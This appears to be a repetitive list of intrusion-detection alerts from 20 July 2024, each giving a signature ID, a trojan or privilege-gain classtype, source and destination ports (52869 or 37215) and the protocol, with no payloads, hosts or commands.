                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.305781
                      SID:2027339
                      Source Port:52648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:53.636754
                      SID:2027339
                      Source Port:34312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.390246
                      SID:2025132
                      Source Port:54794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.102919
                      SID:2831300
                      Source Port:60570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.749469
                      SID:2027339
                      Source Port:46454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.196993
                      SID:2829579
                      Source Port:33424
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.186337
                      SID:2025132
                      Source Port:56660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.063994
                      SID:2027339
                      Source Port:45782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.834296
                      SID:2027339
                      Source Port:33796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.136560
                      SID:2025132
                      Source Port:60048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.412156
                      SID:2025132
                      Source Port:44554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.663244
                      SID:2027339
                      Source Port:58542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.146169
                      SID:2831300
                      Source Port:54036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.346494
                      SID:2027339
                      Source Port:41456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.589759
                      SID:2831300
                      Source Port:59784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.512168
                      SID:2027339
                      Source Port:38104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.663245
                      SID:2027339
                      Source Port:36028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.809716
                      SID:2027339
                      Source Port:37290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.390301
                      SID:2027339
                      Source Port:51446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.818567
                      SID:2027339
                      Source Port:60200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.220244
                      SID:2025132
                      Source Port:40518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.223705
                      SID:2831300
                      Source Port:35596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.630833
                      SID:2829579
                      Source Port:36586
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:18.238800
                      SID:2025132
                      Source Port:60464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.070413
                      SID:2025132
                      Source Port:33184
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.322055
                      SID:2025132
                      Source Port:42282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.915641
                      SID:2025132
                      Source Port:37908
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.821658
                      SID:2027339
                      Source Port:57088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.719998
                      SID:2027339
                      Source Port:40662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.508021
                      SID:2027339
                      Source Port:50758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.233561
                      SID:2027339
                      Source Port:54774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.066716
                      SID:2027339
                      Source Port:37184
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.636583
                      SID:2025132
                      Source Port:55272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.013095
                      SID:2829579
                      Source Port:49406
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.617689
                      SID:2831300
                      Source Port:60274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.596401
                      SID:2027339
                      Source Port:46360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.632393
                      SID:2829579
                      Source Port:52048
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.762943
                      SID:2027339
                      Source Port:53296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.989167
                      SID:2835222
                      Source Port:46306
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.295391
                      SID:2025132
                      Source Port:50356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.634606
                      SID:2027339
                      Source Port:33464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.181938
                      SID:2835222
                      Source Port:32836
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.945733
                      SID:2025132
                      Source Port:33618
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.261026
                      SID:2027339
                      Source Port:38576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.096223
                      SID:2027339
                      Source Port:60328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.932550
                      SID:2027339
                      Source Port:35906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.095767
                      SID:2027339
                      Source Port:58042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.161614
                      SID:2835222
                      Source Port:54432
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.995118
                      SID:2831300
                      Source Port:60430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.194576
                      SID:2835222
                      Source Port:34208
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.960623
                      SID:2027339
                      Source Port:45334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.809920
                      SID:2831300
                      Source Port:54402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.627588
                      SID:2025132
                      Source Port:51950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.444461
                      SID:2831300
                      Source Port:47526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.152789
                      SID:2831300
                      Source Port:38362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.571946
                      SID:2831300
                      Source Port:54340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:14.367036
                      SID:2025132
                      Source Port:44160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.233561
                      SID:2831300
                      Source Port:39054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:59.449569
                      SID:2027339
                      Source Port:58072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.113054
                      SID:2835222
                      Source Port:35512
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650975
                      SID:2829579
                      Source Port:53368
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.642449
                      SID:2829579
                      Source Port:41180
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.639230
                      SID:2835222
                      Source Port:41434
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.591702
                      SID:2831300
                      Source Port:40612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.976649
                      SID:2829579
                      Source Port:45982
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.481306
                      SID:2025132
                      Source Port:56798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.220905
                      SID:2835222
                      Source Port:40282
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.266946
                      SID:2025132
                      Source Port:51804
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.045749
                      SID:2829579
                      Source Port:53856
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.419124
                      SID:2027339
                      Source Port:35788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.867858
                      SID:2829579
                      Source Port:48344
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.566124
                      SID:2027339
                      Source Port:41876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.740527
                      SID:2027339
                      Source Port:43206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.193913
                      SID:2027339
                      Source Port:54490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.654988
                      SID:2835222
                      Source Port:45546
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.870961
                      SID:2025132
                      Source Port:42288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.585790
                      SID:2831300
                      Source Port:58538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.582631
                      SID:2027339
                      Source Port:37576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.758923
                      SID:2027339
                      Source Port:35628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.196200
                      SID:2831300
                      Source Port:56512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:56.400580
                      SID:2027339
                      Source Port:57238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.105395
                      SID:2835222
                      Source Port:42942
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.158864
                      SID:2027339
                      Source Port:42424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.190671
                      SID:2025132
                      Source Port:54998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.197712
                      SID:2027339
                      Source Port:46672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.898476
                      SID:2835222
                      Source Port:48420
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.263141
                      SID:2025132
                      Source Port:43200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.606975
                      SID:2831300
                      Source Port:58218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.221313
                      SID:2835222
                      Source Port:37348
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.580548
                      SID:2025132
                      Source Port:52210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.533289
                      SID:2027339
                      Source Port:44910
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650871
                      SID:2835222
                      Source Port:52838
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.075937
                      SID:2835222
                      Source Port:51020
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.669446
                      SID:2027339
                      Source Port:47742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.974605
                      SID:2831300
                      Source Port:52974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:55.870348
                      SID:2025132
                      Source Port:37940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.070492
                      SID:2835222
                      Source Port:33456
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.652628
                      SID:2027339
                      Source Port:50702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.813611
                      SID:2027339
                      Source Port:41022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.107223
                      SID:2831300
                      Source Port:36048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.890268
                      SID:2025132
                      Source Port:48568
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.040108
                      SID:2831300
                      Source Port:51954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:06.975117
                      SID:2829579
                      Source Port:45108
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.919725
                      SID:2831300
                      Source Port:45992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.600680
                      SID:2027339
                      Source Port:34588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.304640
                      SID:2027339
                      Source Port:60192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.654172
                      SID:2835222
                      Source Port:48970
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.915268
                      SID:2829579
                      Source Port:54320
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.384516
                      SID:2831300
                      Source Port:56926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.104571
                      SID:2835222
                      Source Port:52394
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.098864
                      SID:2027339
                      Source Port:52864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.113037
                      SID:2835222
                      Source Port:53606
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.894099
                      SID:2835222
                      Source Port:56780
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.367854
                      SID:2025132
                      Source Port:41138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.563475
                      SID:2027339
                      Source Port:52248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.994337
                      SID:2835222
                      Source Port:40450
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.304951
                      SID:2027339
                      Source Port:54288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.999179
                      SID:2027339
                      Source Port:43092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:06.767377
                      SID:2027339
                      Source Port:60718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.313415
                      SID:2025132
                      Source Port:42688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.047411
                      SID:2835222
                      Source Port:43302
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.808678
                      SID:2025132
                      Source Port:53342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.730585
                      SID:2835222
                      Source Port:54896
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.104572
                      SID:2835222
                      Source Port:32886
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.236294
                      SID:2025132
                      Source Port:55250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.766845
                      SID:2027339
                      Source Port:49744
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.634089
                      SID:2835222
                      Source Port:48680
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.006773
                      SID:2027339
                      Source Port:37276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.464382
                      SID:2027339
                      Source Port:42596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.738271
                      SID:2027339
                      Source Port:44640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221301
                      SID:2835222
                      Source Port:49974
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.333872
                      SID:2831300
                      Source Port:51986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.520663
                      SID:2027339
                      Source Port:52002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.305893
                      SID:2027339
                      Source Port:60312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.158279
                      SID:2829579
                      Source Port:58944
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.599458
                      SID:2027339
                      Source Port:34350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.636599
                      SID:2835222
                      Source Port:42506
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.058922
                      SID:2829579
                      Source Port:57500
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.780168
                      SID:2027339
                      Source Port:46568
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.225146
                      SID:2025132
                      Source Port:47758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.653586
                      SID:2829579
                      Source Port:51976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:17.128771
                      SID:2025132
                      Source Port:53648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:12.861753
                      SID:2027339
                      Source Port:49736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.168569
                      SID:2835222
                      Source Port:35840
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.749865
                      SID:2027339
                      Source Port:59638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.878540
                      SID:2027339
                      Source Port:51740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633984
                      SID:2829579
                      Source Port:36626
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.640312
                      SID:2835222
                      Source Port:57110
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.615260
                      SID:2027339
                      Source Port:46546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.039504
                      SID:2027339
                      Source Port:37938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.350108
                      SID:2027339
                      Source Port:57110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.216693
                      SID:2831300
                      Source Port:49644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:59.704241
                      SID:2025132
                      Source Port:54748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.203681
                      SID:2027339
                      Source Port:43904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.132511
                      SID:2835222
                      Source Port:53800
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.995637
                      SID:2027339
                      Source Port:54930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.014480
                      SID:2831300
                      Source Port:46038
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.500152
                      SID:2025132
                      Source Port:40244
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.602081
                      SID:2025132
                      Source Port:33104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.075937
                      SID:2835222
                      Source Port:40714
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.501090
                      SID:2025132
                      Source Port:60800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:54.672544
                      SID:2027339
                      Source Port:37854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.603553
                      SID:2027339
                      Source Port:60298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.672378
                      SID:2831300
                      Source Port:58926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.656128
                      SID:2835222
                      Source Port:35156
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.986571
                      SID:2829579
                      Source Port:50630
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.055673
                      SID:2027339
                      Source Port:58984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.181938
                      SID:2835222
                      Source Port:37164
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.310207
                      SID:2829579
                      Source Port:56386
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.423882
                      SID:2027339
                      Source Port:37532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.608087
                      SID:2831300
                      Source Port:37112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.922746
                      SID:2831300
                      Source Port:55594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.271801
                      SID:2027339
                      Source Port:54610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.098209
                      SID:2835222
                      Source Port:38716
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.580167
                      SID:2831300
                      Source Port:40960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.053605
                      SID:2829579
                      Source Port:57400
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.290278
                      SID:2027339
                      Source Port:33108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.508957
                      SID:2027339
                      Source Port:43964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.983105
                      SID:2829579
                      Source Port:55394
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.979094
                      SID:2027339
                      Source Port:41372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.178062
